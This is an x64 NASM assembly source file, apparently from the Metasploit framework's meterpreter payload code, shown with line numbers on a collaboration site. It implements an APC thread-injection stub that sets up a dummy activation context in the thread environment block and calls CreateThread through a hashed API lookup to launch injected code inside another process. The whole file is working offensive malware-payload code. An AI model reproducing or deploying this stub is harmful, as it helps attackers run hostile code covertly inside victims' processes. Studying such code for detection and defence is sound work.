Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
;-----------------------------------------------------------------------------;
2
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
3
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
4
; Architecture: x64
5
; Version: 2.0 (March 2010)
6
; Size: 323 bytes
7
; Build: >build.py apc
8
;-----------------------------------------------------------------------------;
9

10
; A small stub to be used for thread injection where we gain execution via an injected APC. See the
11
; file "\msf3\external\source\meterpreter\source\common\arch\win\i386\base_inject.c" for more details
12

13
;typedef struct _APCCONTEXT
14
;{
15
; 	union
16
;	{
17
;		LPVOID lpStartAddress;
18
;		BYTE bPadding1[8]; 
19
;	} s;
20
;	union
21
;	{
22
; 		LPVOID lpParameter;
23
;		BYTE bPadding2[8];
24
;	} p;
25
;   BYTE bExecuted;
26
;} APCCONTEXT, * LPAPCCONTEXT;
27

28
[BITS 64]
29
[ORG 0]
30

31
  cld                      ; Clear the direction flag.
32
  cmp byte [rcx+16], 0     ; Has this context allready been injected? 'if( ctx->bExecuted == FALSE )'
33
  jne cleanup              ; If so just leave this APC
34
  mov byte [rcx+16], 1     ; Otherwise mark the context as executed and proceed
35
  sub rsp, 120             ; Alloc some space on stack
36
  call start               ; Call start, this pushes the address of 'api_call' onto the stack.
37
delta:                     ;
38
%include "./src/block/block_api.asm" ;
39
start:                     ;
40
  pop rbp                  ; Pop off the address of 'api_call' for calling later.
41
  xor rdx, rdx             ; zero RDX
42
  mov rax, [gs:rdx+48]     ; Get the current TEB
43
  cmp qword [rax+712], rdx ; Is the TEB ActivationContextStackPointer pointer NULL?
44
  jne continue             ; If there already is an ActivationContext structure setup, just continue
45
  lea rdx, [rbp+context-delta] ; calculate the address of our dummy ActivationContext
46
  mov qword [rax+712], rdx ; and set the address of our dummy ActivationContext in the current TEB
47
continue:
48
  mov r8, [rcx]            ; r8 = ctx->lpStartAddress
49
  mov r9, [rcx+8]          ; r9 = ctx->lpParameter
50
  xor rcx, rcx             ; Clear ECX, lpThreadAttributes
51
  xor rdx, rdx             ; Clear EDX, dwStackSize
52
  push rcx                 ; lpThreadId 
53
  push rcx                 ; dwCreationFlags
54
  mov r10d, 0x160D6838     ; hash( "kernel32.dll", "CreateThread" )
55
  call rbp                 ; CreateThread( NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL );
56
  add rsp, (120 + 32 + (8*2)) ; fix up stack (120 bytes we alloced, 32 bytes for the single call to api_call, and 2*8 bytes for the two params we pushed).
57
cleanup:
58
  ret                      ; Return and finish our APC routine.
59
context:
60
  TIMES 0x24 db 0          ; An empty ntdll!_ACTIVATION_CONTEXT_STACK structure
61